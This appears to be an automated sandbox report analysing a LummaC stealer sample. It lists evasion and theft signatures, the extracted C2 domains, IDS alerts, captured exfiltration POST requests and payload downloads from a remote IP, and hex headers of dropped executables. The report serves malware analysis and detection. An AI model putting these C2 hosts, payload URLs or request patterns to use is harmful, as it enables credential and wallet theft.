Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546394
MD5:90a33d2fa972c6879876cfd76b3bb7f2
SHA1:bde748d82306d4e3807b87fd23486b9b2e85bf8d
SHA256:1eea8b150ca28b1b58a43dfbe65e9949cfa563df212e1c43929931750f047180
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file overlay found
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 2136 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 90A33D2FA972C6879876CFD76B3BB7F2)
    • UK2346Q4E08RPNV0H.exe (PID: 672 cmdline: "C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe" MD5: 69621666073B77F9D5D771808DC1A7A6)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["presticitpo.store", "scriptyprefej.store", "fadehairucw.store", "crisiwarny.store", "necklacedmny.store", "founpiuer.store", "navygenerayk.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 2136JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: file.exe PID: 2136JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 2136JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:49:13.867958+010020229301A Network Trojan was detected52.149.20.212443192.168.2.649757TCP
          2024-10-31T20:49:51.689201+010020229301A Network Trojan was detected52.149.20.212443192.168.2.649953TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:48:58.448758+010020283713Unknown Traffic192.168.2.649709188.114.97.3443TCP
          2024-10-31T20:48:59.810598+010020283713Unknown Traffic192.168.2.649710188.114.97.3443TCP
          2024-10-31T20:49:01.168646+010020283713Unknown Traffic192.168.2.649712188.114.97.3443TCP
          2024-10-31T20:49:02.812504+010020283713Unknown Traffic192.168.2.649713188.114.97.3443TCP
          2024-10-31T20:49:04.206088+010020283713Unknown Traffic192.168.2.649715188.114.97.3443TCP
          2024-10-31T20:49:06.002696+010020283713Unknown Traffic192.168.2.649716188.114.97.3443TCP
          2024-10-31T20:49:07.653171+010020283713Unknown Traffic192.168.2.649727188.114.97.3443TCP
          2024-10-31T20:49:10.361047+010020283713Unknown Traffic192.168.2.649743188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:48:59.142708+010020546531A Network Trojan was detected192.168.2.649709188.114.97.3443TCP
          2024-10-31T20:49:00.303597+010020546531A Network Trojan was detected192.168.2.649710188.114.97.3443TCP
          2024-10-31T20:49:11.041358+010020546531A Network Trojan was detected192.168.2.649743188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:48:59.142708+010020498361A Network Trojan was detected192.168.2.649709188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:49:00.303597+010020498121A Network Trojan was detected192.168.2.649710188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:48:58.448758+010020571241Domain Observed Used for C2 Detected192.168.2.649709188.114.97.3443TCP
          2024-10-31T20:48:59.810598+010020571241Domain Observed Used for C2 Detected192.168.2.649710188.114.97.3443TCP
          2024-10-31T20:49:01.168646+010020571241Domain Observed Used for C2 Detected192.168.2.649712188.114.97.3443TCP
          2024-10-31T20:49:02.812504+010020571241Domain Observed Used for C2 Detected192.168.2.649713188.114.97.3443TCP
          2024-10-31T20:49:04.206088+010020571241Domain Observed Used for C2 Detected192.168.2.649715188.114.97.3443TCP
          2024-10-31T20:49:06.002696+010020571241Domain Observed Used for C2 Detected192.168.2.649716188.114.97.3443TCP
          2024-10-31T20:49:07.653171+010020571241Domain Observed Used for C2 Detected192.168.2.649727188.114.97.3443TCP
          2024-10-31T20:49:10.361047+010020571241Domain Observed Used for C2 Detected192.168.2.649743188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:49:11.988767+010020197142Potentially Bad Traffic192.168.2.649749185.215.113.1680TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:48:57.734269+010020571291Domain Observed Used for C2 Detected192.168.2.6509871.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:48:57.748624+010020571271Domain Observed Used for C2 Detected192.168.2.6614671.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:48:57.770803+010020571231Domain Observed Used for C2 Detected192.168.2.6527431.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:48:57.720337+010020571311Domain Observed Used for C2 Detected192.168.2.6631311.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:48:57.759260+010020571251Domain Observed Used for C2 Detected192.168.2.6538621.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T20:49:06.517646+010020480941Malware Command and Control Activity Detected192.168.2.649716188.114.97.3443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: file.exeAvira: detected
          Source: file.exe.2136.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "scriptyprefej.store", "fadehairucw.store", "crisiwarny.store", "necklacedmny.store", "founpiuer.store", "navygenerayk.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}
          Source: file.exeReversingLabs: Detection: 42%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exeJoe Sandbox ML: detected
          Source: file.exeJoe Sandbox ML: detected
          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49743 version: TLS 1.2
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: UK2346Q4E08RPNV0H.exe, 00000006.00000002.2730893202.0000000000CB2000.00000040.00000001.01000000.00000006.sdmp, UK2346Q4E08RPNV0H.exe, 00000006.00000003.2597529409.00000000048A0000.00000004.00001000.00020000.00000000.sdmp

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:63131 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:50987 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:53862 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:52743 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:61467 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49713 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49709 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49716 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49715 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49710 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49727 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49712 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49743 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49716 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49743 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.97.3:443
          Source: Malware configuration extractorURLs: presticitpo.store
          Source: Malware configuration extractorURLs: scriptyprefej.store
          Source: Malware configuration extractorURLs: fadehairucw.store
          Source: Malware configuration extractorURLs: crisiwarny.store
          Source: Malware configuration extractorURLs: necklacedmny.store
          Source: Malware configuration extractorURLs: founpiuer.store
          Source: Malware configuration extractorURLs: navygenerayk.store
          Source: Malware configuration extractorURLs: thumbystriw.store
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 19:49:11 GMTContent-Type: application/octet-streamContent-Length: 2822144Last-Modified: Thu, 31 Oct 2024 19:14:55 GMTConnection: keep-aliveETag: "6723d72f-2b1000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 80 36 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 77 6b 73 69 67 6d 6c 00 c0 2a 00 00 a0 00 00 00 b0 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 74 77 6e 6d 63 63 73 00 20 00 00 00 60 2b 00 00 04 00 00 00 ea 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 ee 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 19:49:42 GMTContent-Type: application/octet-streamContent-Length: 1886208Last-Modified: Thu, 31 Oct 2024 19:30:05 GMTConnection: keep-aliveETag: "6723dabd-1cc800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 32 ce 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 ca 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 ca 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 68 6c 65 6a 73 74 62 00 b0 19 00 00 20 31 00 00 ac 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 73 70 74 75 79 79 6e 00 10 00 00 00 d0 4a 00 00 04 00 00 00 a2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 a6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49743 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49727 -> 188.114.97.3:443
          Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49749 -> 185.215.113.16:80
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49757
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49953
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12864Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15110Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19968Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1219Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568808Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: necklacedmny.store
          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
